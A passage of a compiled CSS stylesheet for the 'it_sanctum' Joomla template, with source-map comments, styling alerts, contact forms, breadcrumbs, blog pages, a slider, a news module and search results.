  background-color: #f8f4ec;
  border-color: #eee4d2;
}
/* line 34, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert a, .alert a:hover, .alert .alert-link, .alert .alert-link:hover {
  color: #a47e3c;
  font-weight: bold;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert a:hover, .alert a:hover:hover, .alert .alert-link:hover, .alert .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert, .text-warning {
  color: #c09853;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert h4 {
  color: #c09853 !important;
}
/* line 53, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-warning:hover, a.text-warning:focus {
  color: #b78c43;
}
/* line 58, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success {
  color: #468847;
  background-color: #dfeedf;
  border-color: #c4e0c4;
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success a, .alert-success a:hover, .alert-success .alert-link, .alert-success .alert-link:hover {
  color: #356635;
  font-weight: bold;
}
/* line 67, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success a:hover, .alert-success a:hover:hover, .alert-success .alert-link:hover, .alert-success .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 73, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-success {
  color: #468847;
}
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success h4 {
  color: #468847 !important;
}
/* line 81, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-success:hover, a.text-success:focus {
  color: #3d773e;
}
/* line 86, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger, .alert-error {
  color: #b94a48;
  background-color: #f6e7e7;
  border-color: #edd1d0;
}
/* line 92, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger a, .alert-error a, .alert-danger a:hover, .alert-error a:hover, .alert-danger .alert-link, .alert-error .alert-link, .alert-danger .alert-link:hover, .alert-error .alert-link:hover {
  color: #953b39;
  font-weight: bold;
}
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger a:hover, .alert-error a:hover, .alert-danger a:hover:hover, .alert-error a:hover:hover, .alert-danger .alert-link:hover, .alert-error .alert-link:hover, .alert-danger .alert-link:hover:hover, .alert-error .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 102, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-error {
  color: #b94a48;
}
/* line 106, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger h4, .alert-error h4 {
  color: #b94a48 !important;
}
/* line 111, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-error:hover, a.text-error:focus {
  color: #a74240;
}
/* line 116, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info {
  color: #3a87ad;
  background-color: #e2eff5;
  border-color: #c7e0ec;
}
/* line 121, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info a, .alert-info a:hover, .alert-info .alert-link, .alert-info .alert-link:hover {
  color: #2d6987;
  font-weight: bold;
}
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info a:hover, .alert-info a:hover:hover, .alert-info .alert-link:hover, .alert-info .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 131, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-info {
  color: #3a87ad;
}
/* line 135, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info h4 {
  color: #3a87ad !important;
}
/* line 139, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-info:hover, a.text-info:focus {
  color: #34789a;
}
/* line 145, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.platform-content input {
  box-sizing: inherit;
}
/* line 150, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.form-actions {
  background-color: transparent;
  border: none;
  margin: 0;
  padding: 0;
}
/* line 158, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact > h3 {
  display: none;
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact .contact-address {
  margin: 0;
}
/* line 8, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form {
  margin-bottom: 0;
}
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form fieldset > legend {
  font-size: 0.9rem;
  color: #282828;
  margin-bottom: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 18, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form.form-horizontal .control-label {
  text-align: left;
}
/* line 22, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form input, .contact #contact-form textarea {
  width: 100%;
}
@media only all and (max-width: 47.938rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form #jform_contact_email_copy {
  width: 10px;
}
/* line 34, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form label {
  margin-top: 3px;
}
/* line 37, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form #jform_contact_email_copy-lbl {
  margin-top: 0;
}
/* line 40, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
@media only all and (max-width: 47.938rem) {
  .contact #contact-form .form-actions {
    padding: 0;
  }
  /* line 43, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
  .contact #contact-form .form-actions > button {
    display: block;
    width: 100%;
  }
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form.well {
  border: none;
  padding: 0;
  background: none;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb {
  margin: 6px 0 0;
  padding: 0;
  background: none;
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  ul.breadcrumb {
    margin: 0;
  }
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li {
  text-shadow: none;
}
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li .divider {
  display: none;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li + li:after {
  content: "/ ";
  padding: 0 5px;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li + li:last-child:after {
  content: none;
  padding: 0;
}
/* line 29, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
@media only all and (max-width: 47.938rem) {
  .g-grid > .g-block:last-child ul.breadcrumb {
    text-align: center;
  }
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
@media only all and (max-width: 47.938rem) {
  .g-grid > .g-block:first-child ul.breadcrumb {
    text-align: center;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog .category-desc, .blog-featured .category-desc {
  margin: -10px 0 30px;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 7, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog .items-more ol, .blog-featured .items-more ol {
  padding-left: 0;
  margin: 0 0 60px 0;
}
/* line 12, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog article.item, .blog-featured article.item {
  margin-bottom: 60px;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.item-page ul.pager {
  margin-bottom: 0;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 26, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
article .item-image {
  margin: 20px 0;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 {
  margin: 10px 0;
}
/* line 35, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 a {
  color: #282828;
}
/* line 37, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 a:hover {
  color: #4f953b;
}
/* line 43, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category form {
  margin-bottom: 0;
}
/* line 48, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header {
  position: relative;
  padding: 0;
}
/* line 51, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons {
  position: relative;
  right: 0;
  top: 32px;
  right: 15px;
}
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 57, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn {
  background: transparent !important;
  border: 0px solid #fff !important;
  padding: 0.3rem 0.6rem !important;
}
/* line 61, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
  color: #959595 !important;
  margin-right: 0px;
}
@media only all and (max-width: 47.938rem) {
  .g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
    margin-top: 5px;
  }
}
/* line 68, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn .caret {
  display: none;
}
/* line 71, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn:hover {
  color: #4f953b !important;
}
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 78, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 {
  margin: 0 0 -10px 0;
}
/* line 80, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 a {
  color: #282828;
}
/* line 82, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 a:hover {
  color: #4f953b;
}
/* line 90, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.readmore {
  margin: 0;
}
/* line 92, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.readmore .btn span {
  display: none;
}
/* line 99, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tags {
  margin-bottom: 1.5rem;
}
/* line 103, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info {
  color: #959595;
  margin: 20px 0 0;
  background: transparent;
  border: 1px solid #ddd;
  padding: 1rem 1.5rem;
}
/* line 109, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info a {
  color: #959595;
}
/* line 112, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info .article-info-term {
  display: none;
}
/* line 115, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info dd {
  display: inline-block;
  margin: 0 20px 0 0;
}
/* line 118, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info dd i {
  margin-right: 5px;
}
@media only all and (max-width: 47.938rem) {
  .article-info {
    text-align: center;
  }
}
/* line 127, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 128, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category form {
  margin-bottom: 0;
}
/* line 131, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination {
  margin-bottom: 0;
}
/* line 133, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination > ul {
  margin-bottom: 0;
  box-shadow: none;
}
/* line 137, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination .counter {
  margin-bottom: 0;
}
@media only all and (max-width: 47.938rem) {
  .content-category .pagination .counter {
    float: none;
  }
}
/* line 146, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination {
  margin: 0;
}
/* line 148, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul {
  margin: 0;
  box-shadow: none;
}
/* line 151, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 152, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > li > a, .pagination ul > li > span {
  color: inherit;
  padding: 0.675rem 1rem;
  margin-right: 5px;
  border: 1px solid #ddd;
  border-radius: 0px !important;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 159, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > li > a:hover, .pagination ul > li > span:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 166, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 167, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > .active > a, .pagination ul > .active > span {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 174, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination .counter {
  margin: 7px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .pagination .counter {
    float: none;
  }
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 183, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 184, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pager li a {
  color: inherit;
  border: 1px solid inherit;
  background: transparent;
  border-radius: 0px;
  padding: 0.675rem 1.5rem;
}
/* line 190, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pager li a:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 4, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-caption a.button {
  color: #fff;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-caption a.button.dark {
  margin-left: 10px;
}
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:before {
  color: #fff;
  display: inline-block;
  font-family: FontAwesome, sans-serif;
  font-size: 20px;
  font-style: normal;
  font-weight: bold;
  margin-right: 0;
  margin-top: 2px;
  text-align: center;
  text-decoration: inherit;
  width: 35px;
}
/* line 26, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows {
  background: #000;
  background: none repeat scroll 0 0 rgba(0, 0, 0, 0.4);
  border-radius: 5px;
  cursor: pointer;
  height: 35px;
  width: 35px;
  -webkit-transition: background 0.3s, opacity 0.3s;
  -moz-transition: background 0.3s, opacity 0.3s;
  transition: background 0.3s, opacity 0.3s;
}
/* line 35, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:hover {
  color: #fff;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-leftarrow:before {
  content: "\f104";
}
/* line 41, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-rightarrow:before {
  content: "\f105";
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows.tp-rightarrow:before {
  margin-left: 1px;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:hover {
  background: #000;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title {
  margin: 0 0 10px;
  font-size: 1.035rem;
  font-weight: normal;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title a {
  color: #282828;
}
/* line 8, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-title a:hover {
  color: #4f953b;
}
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-introtext {
  margin: 0;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-social span {
  margin-left: 0 !important;
  margin-right: 10px;
}
/* line 22, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-rating {
  margin-bottom: 10px;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links {
  margin-top: 10px;
  font-size: 0.81rem;
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-created {
  margin-right: 15px;
}
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-created:before {
  content: "\f017";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 36, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-author {
  margin-right: 15px;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-author:before {
  content: "\f007";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category {
  margin-right: 15px;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a {
  color: #959595;
}
/* line 48, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a:before {
  content: "\f07c";
  font-family: FontAwesome;
  margin-right: 2px;
}
/* line 53, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-category a:hover {
  color: #4f953b;
}
/* line 58, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments {
  margin: 0;
  margin-right: 15px;
  color: #959595;
  background: none;
  padding: 0;
  font-size: inherit;
}
/* line 65, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments:before {
  content: "\f086";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 70, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-comments:hover {
  color: #4f953b;
}
/* line 74, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-hits {
  margin-right: 15px;
  background: none;
  padding: 0;
  color: #959595;
  font-size: inherit;
}
/* line 80, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-hits:before {
  content: "\f06e";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 86, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore {
  margin: 0;
  margin-right: 15px;
  color: #959595;
}
/* line 90, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore span {
  background: none;
  padding: 0;
  font-size: inherit;
}
/* line 95, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore:before {
  content: "\f0c1";
  font-family: FontAwesome;
  margin-right: 6px;
}
/* line 100, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-links .ns2-readmore:hover {
  color: #4f953b;
}
/* line 105, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom {
  overflow: hidden;
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom > div {
  margin-bottom: 30px;
}
/* line 109, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-page-inner-custom > div:last-child {
  margin-bottom: 0;
}
/* line 114, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-link {
  position: relative;
}
/* line 116, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 117, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-link:hover .ns2-image-overlay {
  opacity: 1;
}
@media only all and (max-width: 30rem) {
  .nssp2 .ns2-image-link {
    margin-bottom: 15px;
  }
}
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-overlay {
  background: rgba(0, 0, 0, 0.5);
  color: #fff;
  padding: 20px;
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  opacity: 0;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
/* line 136, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-overlay:before {
  font-size: 25px;
  height: 25px;
  width: 25px;
  margin-left: -11px;
  margin-top: -17px;
  color: #fff;
  position: absolute;
  left: 50%;
  top: 50%;
  content: "\f0c1";
  font-family: FontAwesome;
}
/* line 151, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap {
  position: relative;
}
/* line 153, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers {
  position: absolute;
  top: -58px;
  right: 0;
}
/* line 157, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  background: none;
  text-indent: 0;
  height: auto;
  width: auto;
}
/* line 163, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 164, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  color: #959595;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 167, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span.active, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span.active {
  color: #c8c8c8;
}
/* line 172, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next {
  padding: 5px 10px;
  background: #4f953b;
  color: #fff;
  border-radius: 3px;
  font-size: 11px;
  margin-top: -4px;
  margin-right: 0;
  margin-left: 5px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next i {
  vertical-align: middle;
}
/* line 185, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next:hover {
  background: #282828;
}
/* line 193, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 194, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 195, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .nssp2 .ns2-title {
  font-size: 0.9rem;
  margin: 0;
}
/* line 200, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 201, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div {
  margin: 0;
  border-bottom: 1px solid #353535;
}
/* line 204, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div:last-child {
  border: none;
}
/* line 206, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 207, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div:last-child .ns2-column > div {
  padding-bottom: 0 !important;
}
/* line 213, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 214, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 215, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom .ns2-first .ns2-column > div {
  padding-top: 0 !important;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results {
  width: 500px;
  margin: 0 auto;
  text-align: center;
  padding: 50px;
  border: 1px solid #ddd;
  margin-bottom: 70px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-form-results {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-form-results {
    width: 100%;
  }
}
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar {
  margin-top: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group {
  float: none;
  margin: 0;
}
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group input {
  width: 100%;
  margin: 0;
  border-right: none;
}
@media only all and (max-width: 30rem) {
  .search .search-form-results .btn-toolbar .btn-group input {
    width: 120px;
  }
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group .btn {
  padding: 0.58rem 1rem !important;
  border-radius: 0 !important;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group .btn > span {
  vertical-align: middle;
  margin: 0;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .searchintro > p {
  margin-bottom: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .searchintro .badge {
  background: #4f953b;
  border-radius: 0;
  text-shadow: none;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options {
  padding: 50px;
  border: 1px solid #ddd;
  margin: 0 auto 50px;
  width: 600px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .search .search-add-options {
    width: 550px;
  }
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options > fieldset {
  display: inline-block;
}
/* line 65, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
